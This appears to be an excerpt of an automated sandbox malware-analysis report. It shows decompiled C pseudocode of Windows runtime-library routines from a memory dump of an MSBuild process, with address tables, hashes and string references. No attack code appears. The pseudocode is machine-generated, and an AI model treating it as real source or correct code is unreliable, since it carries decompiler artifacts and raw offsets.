																	_t122 = L010B38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E010B76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E010B76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L010DFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L010B70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E010DFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E010DFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E010DFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E010DFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E010DFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1197b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1197b84 = _t75;
						_t73 = E010BEB70(_t134, 0x1197b60);
						if( *0x1197b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E010BFF60( *0x1197b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                                0x010dfab0
                                                                                                0x010dfab2
                                                                                                0x010dfab3
                                                                                                0x010dfab4
                                                                                                0x010dfabc
                                                                                                0x010dfac0
                                                                                                0x010dfb14
                                                                                                0x010dfb17
                                                                                                0x010dfac2
                                                                                                0x010dfac8
                                                                                                0x010dfacd
                                                                                                0x010dfad3
                                                                                                0x010dfad3
                                                                                                0x010dfadd
                                                                                                0x010dfb18
                                                                                                0x010dfb1b
                                                                                                0x010dfb1d
                                                                                                0x010dfb1e
                                                                                                0x010dfb1f
                                                                                                0x010dfb20
                                                                                                0x010dfb21
                                                                                                0x010dfb22
                                                                                                0x010dfb23
                                                                                                0x010dfb24
                                                                                                0x010dfb25
                                                                                                0x010dfb26
                                                                                                0x010dfb27
                                                                                                0x010dfb28
                                                                                                0x010dfb29
                                                                                                0x010dfb2a
                                                                                                0x010dfb2b
                                                                                                0x010dfb2c
                                                                                                0x010dfb2d
                                                                                                0x010dfb2e
                                                                                                0x010dfb2f
                                                                                                0x010dfb3a
                                                                                                0x010dfb3b
                                                                                                0x010dfb3e
                                                                                                0x010dfb41
                                                                                                0x010dfb44
                                                                                                0x010dfb47
                                                                                                0x010dfb4a
                                                                                                0x010dfb4d
                                                                                                0x010dfb53
                                                                                                0x0111bdcb
                                                                                                0x0111bdcb
                                                                                                0x010dfb59
                                                                                                0x010dfb5b
                                                                                                0x010dfb5b
                                                                                                0x010dfb5e
                                                                                                0x0111bdd5
                                                                                                0x0111bdd8
                                                                                                0x00000000
                                                                                                0x0111bdda
                                                                                                0x00000000
                                                                                                0x0111bdda
                                                                                                0x010dfb64
                                                                                                0x010dfb64
                                                                                                0x010dfb64
                                                                                                0x010dfb67
                                                                                                0x010dfb6e
                                                                                                0x010dfb70
                                                                                                0x010dfb72
                                                                                                0x00000000
                                                                                                0x010dfb78
                                                                                                0x010dfb7a
                                                                                                0x010dfb7a
                                                                                                0x010dfb7d
                                                                                                0x010dfb80
                                                                                                0x0111bddf
                                                                                                0x0111bde1
                                                                                                0x00000000
                                                                                                0x0111bde3
                                                                                                0x00000000
                                                                                                0x0111bde3
                                                                                                0x010dfb86
                                                                                                0x010dfb86
                                                                                                0x010dfb86
                                                                                                0x010dfb8b
                                                                                                0x010dfb90
                                                                                                0x010dfb92
                                                                                                0x010dfb94
                                                                                                0x010dfb9a
                                                                                                0x010dfb9b
                                                                                                0x010dfba1
                                                                                                0x0111bde8
                                                                                                0x0111bdeb
                                                                                                0x0111bded
                                                                                                0x0111beb5
                                                                                                0x0111beb5
                                                                                                0x0111bebb
                                                                                                0x0111bebd
                                                                                                0x0111bec3
                                                                                                0x0111bed2
                                                                                                0x0111bedd
                                                                                                0x0111bedd
                                                                                                0x0111beed
                                                                                                0x00000000
                                                                                                0x0111bdf3
                                                                                                0x0111bdfe
                                                                                                0x0111be06
                                                                                                0x0111be0b
                                                                                                0x0111be0d
                                                                                                0x0111be0f
                                                                                                0x0111be14
                                                                                                0x0111be19
                                                                                                0x0111be20
                                                                                                0x0111be25
                                                                                                0x0111be27
                                                                                                0x0111be35
                                                                                                0x0111be39
                                                                                                0x0111be46
                                                                                                0x0111be4f
                                                                                                0x0111be54
                                                                                                0x0111be56
                                                                                                0x0111bef8
                                                                                                0x0111bef8
                                                                                                0x00000000
                                                                                                0x0111be5c
                                                                                                0x0111be5c
                                                                                                0x0111be60
                                                                                                0x00000000
                                                                                                0x0111be66
                                                                                                0x0111be66
                                                                                                0x0111be7f
                                                                                                0x0111be84
                                                                                                0x0111be87
                                                                                                0x0111be89
                                                                                                0x0111be8b
                                                                                                0x0111be99
                                                                                                0x0111be9d
                                                                                                0x0111bea0
                                                                                                0x0111beac
                                                                                                0x0111beaf
                                                                                                0x0111beb1
                                                                                                0x0111beb3
                                                                                                0x0111beb3
                                                                                                0x00000000
                                                                                                0x0111bea2
                                                                                                0x0111bea2
                                                                                                0x00000000
                                                                                                0x0111bea2
                                                                                                0x0111be8d
                                                                                                0x0111be8d
                                                                                                0x0111be92
                                                                                                0x00000000
                                                                                                0x0111be92
                                                                                                0x0111be8b
                                                                                                0x0111be60
                                                                                                0x0111be3b
                                                                                                0x0111be3b
                                                                                                0x0111be3e
                                                                                                0x00000000
                                                                                                0x0111be40
                                                                                                0x0111be40
                                                                                                0x0111be44
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0111be44
                                                                                                0x0111be3e
                                                                                                0x0111be29
                                                                                                0x0111be29
                                                                                                0x00000000
                                                                                                0x0111be29
                                                                                                0x0111be27
                                                                                                0x00000000
                                                                                                0x010dfba7
                                                                                                0x010dfba7
                                                                                                0x010dfbab
                                                                                                0x0111bf02
                                                                                                0x010dfbb1
                                                                                                0x010dfbb1
                                                                                                0x010dfbb8
                                                                                                0x010dfbbd
                                                                                                0x010dfbbd
                                                                                                0x010dfbbf
                                                                                                0x010dfbbf
                                                                                                0x010dfbc5
                                                                                                0x010dfbcb
                                                                                                0x010dfbf8
                                                                                                0x010dfbf8
                                                                                                0x010dfbfa
                                                                                                0x00000000
                                                                                                0x010dfc00
                                                                                                0x010dfc00
                                                                                                0x010dfc03
                                                                                                0x00000000
                                                                                                0x010dfc09
                                                                                                0x010dfc09
                                                                                                0x010dfc0f
                                                                                                0x010dfc15
                                                                                                0x010dfc23
                                                                                                0x010dfc23
                                                                                                0x010dfc25
                                                                                                0x010dfc27
                                                                                                0x010dfc75
                                                                                                0x010dfc7c
                                                                                                0x010dfc84
                                                                                                0x00000000
                                                                                                0x010dfc29
                                                                                                0x010dfc29
                                                                                                0x010dfc2d
                                                                                                0x010dfc30
                                                                                                0x0111bf0f
                                                                                                0x00000000
                                                                                                0x010dfc36
                                                                                                0x010dfc38
                                                                                                0x010dfc3b
                                                                                                0x010dfc41
                                                                                                0x0111bf17
                                                                                                0x0111bf19
                                                                                                0x0111bf48
                                                                                                0x0111bf4b
                                                                                                0x00000000
                                                                                                0x0111bf1b
                                                                                                0x0111bf22
                                                                                                0x0111bf24
                                                                                                0x0111bf26
                                                                                                0x00000000
                                                                                                0x0111bf2c
                                                                                                0x0111bf37
                                                                                                0x0111bf39
                                                                                                0x0111bf3b
                                                                                                0x00000000
                                                                                                0x0111bf41
                                                                                                0x0111bf41
                                                                                                0x0111bf41
                                                                                                0x0111bf41
                                                                                                0x0111bf45
                                                                                                0x00000000
                                                                                                0x0111bf45
                                                                                                0x0111bf3b
                                                                                                0x0111bf26
                                                                                                0x00000000
                                                                                                0x010dfc47
                                                                                                0x010dfc47
                                                                                                0x010dfc49
                                                                                                0x010dfcb2
                                                                                                0x010dfcb4
                                                                                                0x010dfcb6
                                                                                                0x010dfcdc
                                                                                                0x010dfcdc
                                                                                                0x00000000
                                                                                                0x010dfcb8
                                                                                                0x010dfcc3
                                                                                                0x010dfcc5
                                                                                                0x010dfcc7
                                                                                                0x00000000
                                                                                                0x010dfcc9
                                                                                                0x010dfcc9
                                                                                                0x010dfccd
                                                                                                0x00000000
                                                                                                0x010dfccd
                                                                                                0x010dfcc7
                                                                                                0x00000000
                                                                                                0x010dfc4b
                                                                                                0x010dfc4b
                                                                                                0x010dfc4e
                                                                                                0x010dfc4e
                                                                                                0x010dfc51
                                                                                                0x010dfc51
                                                                                                0x010dfc54
                                                                                                0x010dfc5a
                                                                                                0x010dfc5c
                                                                                                0x010dfc5f
                                                                                                0x010dfc61
                                                                                                0x010dfc63
                                                                                                0x010dfc65
                                                                                                0x010dfc67
                                                                                                0x010dfc6e
                                                                                                0x010dfc72
                                                                                                0x010dfc72
                                                                                                0x010dfc72
                                                                                                0x010dfc72
                                                                                                0x010dfc67
                                                                                                0x010dfc61
                                                                                                0x00000000
                                                                                                0x010dfc5a
                                                                                                0x010dfc49
                                                                                                0x010dfc41
                                                                                                0x010dfc30
                                                                                                0x010dfc27
                                                                                                0x010dfc03
                                                                                                0x010dfbcd
                                                                                                0x010dfbd3
                                                                                                0x010dfbd9
                                                                                                0x010dfbdc
                                                                                                0x010dfbde
                                                                                                0x010dfc99
                                                                                                0x010dfc9b
                                                                                                0x010dfc9d
                                                                                                0x010dfcd5
                                                                                                0x010dfcd5
                                                                                                0x010dfc89
                                                                                                0x010dfc89
                                                                                                0x00000000
                                                                                                0x010dfc9f
                                                                                                0x010dfc9f
                                                                                                0x010dfca3
                                                                                                0x00000000
                                                                                                0x010dfca3
                                                                                                0x00000000
                                                                                                0x010dfbe4
                                                                                                0x010dfbe4
                                                                                                0x010dfbe4
                                                                                                0x010dfbe4
                                                                                                0x010dfbe9
                                                                                                0x010dfbf2
                                                                                                0x00000000
                                                                                                0x010dfbf2
                                                                                                0x010dfbde
                                                                                                0x010dfbcb
                                                                                                0x010dfbab
                                                                                                0x010dfc8b
                                                                                                0x010dfc8b
                                                                                                0x010dfc8c
                                                                                                0x010dfb80
                                                                                                0x010dfb72
                                                                                                0x010dfb5e
                                                                                                0x010dfc8d
                                                                                                0x010dfc91
                                                                                                0x010dfadf
                                                                                                0x010dfadf
                                                                                                0x010dfae1
                                                                                                0x010dfae4
                                                                                                0x010dfae7
                                                                                                0x010dfaec
                                                                                                0x010dfaf8
                                                                                                0x010dfb00
                                                                                                0x010dfb07
                                                                                                0x010dfb0f
                                                                                                0x010dfb0f
                                                                                                0x010dfb07
                                                                                                0x00000000
                                                                                                0x010dfaf8
                                                                                                0x010dfadd

                                                                                                Strings
                                                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0111BE0F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                • API String ID: 0-865735534
                                                                                                • Opcode ID: 056f6a253bc53197cb540744078cef95947f1d98d5c701b96aff0a15db017774
                                                                                                • Instruction ID: 2cd0bed982ab2230fa606f4a06f2950669f50f6e07cf3b302543971f488bb916
                                                                                                • Opcode Fuzzy Hash: 056f6a253bc53197cb540744078cef95947f1d98d5c701b96aff0a15db017774
                                                                                                • Instruction Fuzzy Hash: 86A10431B0070B8BEB29DB68C5507BEB7B5AF48724F048579E997DB684DB30D842CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010A2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 63%
                                                                                                			E010A2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1195350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1197bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E010E97C0();
				}
				if( *0x11979c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x11979c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E010D1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E010C7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0113FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E010E9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E010DE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								E010FDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1196901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1196901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E010E9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E010E95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E010C7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E010C7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01127016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0113FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1195350;
							if(_t109 != 0x1195350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0113FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01135720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                                0x010a2d8a
                                                                                                0x010a2d8a
                                                                                                0x010a2d92
                                                                                                0x010a2d96
                                                                                                0x010a2d9e
                                                                                                0x010a2da0
                                                                                                0x010a2da3
                                                                                                0x010a2da5
                                                                                                0x010a2da8
                                                                                                0x010a2dab
                                                                                                0x010a2db2
                                                                                                0x010ff9aa
                                                                                                0x010ff9ab
                                                                                                0x010ff9ae
                                                                                                0x010ff9ae
                                                                                                0x010a2db8
                                                                                                0x010a2dc2
                                                                                                0x010ff9b9
                                                                                                0x010ff9be
                                                                                                0x010ff9bf
                                                                                                0x010ff9bf
                                                                                                0x010a2dcf
                                                                                                0x010ff9c9
                                                                                                0x010a2dd5
                                                                                                0x010a2dd5
                                                                                                0x010a2dd5
                                                                                                0x010a2dde
                                                                                                0x010a2de1
                                                                                                0x010a2e70
                                                                                                0x010a2e72
                                                                                                0x010a2e72
                                                                                                0x010a2de7
                                                                                                0x010a2deb
                                                                                                0x010a2e7c
                                                                                                0x010a2e83
                                                                                                0x010a2e85
                                                                                                0x010a2e8b
                                                                                                0x010a2e8d
                                                                                                0x010a2e92
                                                                                                0x010a2e92
                                                                                                0x010a2e85
                                                                                                0x010a2df1
                                                                                                0x010a2df7
                                                                                                0x010a2df9
                                                                                                0x010a2df9
                                                                                                0x010a2dfc
                                                                                                0x010a2dff
                                                                                                0x010a2e02
                                                                                                0x00000000
                                                                                                0x010a2e05
                                                                                                0x010a2e0c
                                                                                                0x010ff9d9
                                                                                                0x010a2e12
                                                                                                0x010a2e12
                                                                                                0x010a2e12
                                                                                                0x010a2e1a
                                                                                                0x010ff9e3
                                                                                                0x010ff9e9
                                                                                                0x010ff9f0
                                                                                                0x010ff9f6
                                                                                                0x010ff9f8
                                                                                                0x010ff9f8
                                                                                                0x010ff9f0
                                                                                                0x010a2e23
                                                                                                0x010ffa02
                                                                                                0x010ffa03
                                                                                                0x010ffa05
                                                                                                0x010ffa06
                                                                                                0x00000000
                                                                                                0x010a2e29
                                                                                                0x010a2e29
                                                                                                0x010a2e2e
                                                                                                0x010a2e34
                                                                                                0x010a2e3e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010a2e44
                                                                                                0x010a2e47
                                                                                                0x010a2e4d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010a2e4f
                                                                                                0x010a2e54
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010a2e5a
                                                                                                0x010a2e5f
                                                                                                0x010a2e9a
                                                                                                0x010a2ea4
                                                                                                0x010a2ea5
                                                                                                0x010a2ea8
                                                                                                0x010a2eaf
                                                                                                0x010a2eb2
                                                                                                0x010a2eb5
                                                                                                0x010ffae9
                                                                                                0x010ffaeb
                                                                                                0x010ffaed
                                                                                                0x010ffaef
                                                                                                0x010ffaf7
                                                                                                0x010ffaf8
                                                                                                0x010ffafd
                                                                                                0x010ffaff
                                                                                                0x010ffb04
                                                                                                0x010ffb04
                                                                                                0x010ffaff
                                                                                                0x010a2ec0
                                                                                                0x010a2ec4
                                                                                                0x010a2ec6
                                                                                                0x010a2ec8
                                                                                                0x010ffb14
                                                                                                0x010ffb18
                                                                                                0x010ffb1e
                                                                                                0x010ffb21
                                                                                                0x010ffb21
                                                                                                0x010a2ece
                                                                                                0x010a2ece
                                                                                                0x010a2ece
                                                                                                0x010a2ed7
                                                                                                0x010a2e61
                                                                                                0x010a2e63
                                                                                                0x010ffa6b
                                                                                                0x010ffa71
                                                                                                0x010ffa76
                                                                                                0x010ffa78
                                                                                                0x010ffa8a
                                                                                                0x010ffa7a
                                                                                                0x010ffa83
                                                                                                0x010ffa83
                                                                                                0x010ffa8f
                                                                                                0x010ffa91
                                                                                                0x010ffa97
                                                                                                0x010ffa9d
                                                                                                0x010ffaa4
                                                                                                0x010ffaaa
                                                                                                0x010ffaaf
                                                                                                0x010ffab1
                                                                                                0x010ffac3
                                                                                                0x010ffab3
                                                                                                0x010ffabc
                                                                                                0x010ffabc
                                                                                                0x010ffac8
                                                                                                0x010ffacb
                                                                                                0x010ffadf
                                                                                                0x010ffadf
                                                                                                0x010ffacb
                                                                                                0x010ffaa4
                                                                                                0x010ffa91
                                                                                                0x010a2e6f
                                                                                                0x010a2e6f
                                                                                                0x010a2e5f
                                                                                                0x010ffa13
                                                                                                0x010ffa15
                                                                                                0x010ffa17
                                                                                                0x010ffa1f
                                                                                                0x010ffa21
                                                                                                0x010ffa22
                                                                                                0x010ffa25
                                                                                                0x010ffa28
                                                                                                0x010ffa2f
                                                                                                0x010ffa2f
                                                                                                0x010ffa2a
                                                                                                0x010ffa2a
                                                                                                0x010ffa2a
                                                                                                0x010ffa31
                                                                                                0x010ffa34
                                                                                                0x010ffa36
                                                                                                0x010ffa3c
                                                                                                0x010ffa3e
                                                                                                0x010ffa41
                                                                                                0x010ffa43
                                                                                                0x010ffa45
                                                                                                0x010ffa45
                                                                                                0x010ffa41
                                                                                                0x010ffa3c
                                                                                                0x010ffa4a
                                                                                                0x010ffa4f
                                                                                                0x010ffa51
                                                                                                0x010ffa53
                                                                                                0x010ffa56
                                                                                                0x010ffa5b
                                                                                                0x010ffa5e
                                                                                                0x00000000
                                                                                                0x010ffa5e
                                                                                                0x010a2e23

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RTL: Re-Waiting
                                                                                                • API String ID: 0-316354757
                                                                                                • Opcode ID: 3f859c1b2d44a438918f4a82511eb0a62aaa29379477dd0ed0f63cb13bd8eab8
                                                                                                • Instruction ID: 7605e026116bd337f09eeb5f35ae591ee52d9c5b4c91a10023b96fe2c8342085
                                                                                                • Opcode Fuzzy Hash: 3f859c1b2d44a438918f4a82511eb0a62aaa29379477dd0ed0f63cb13bd8eab8
                                                                                                • Instruction Fuzzy Hash: A3614472A00606AFDB32DFACC841BBEBBE5EB44714F1402A9D6D1A76C1D7349D41CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01170EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 80%
                                                                                                			E01170EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0116FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01171074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E010E9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0116A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0116A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
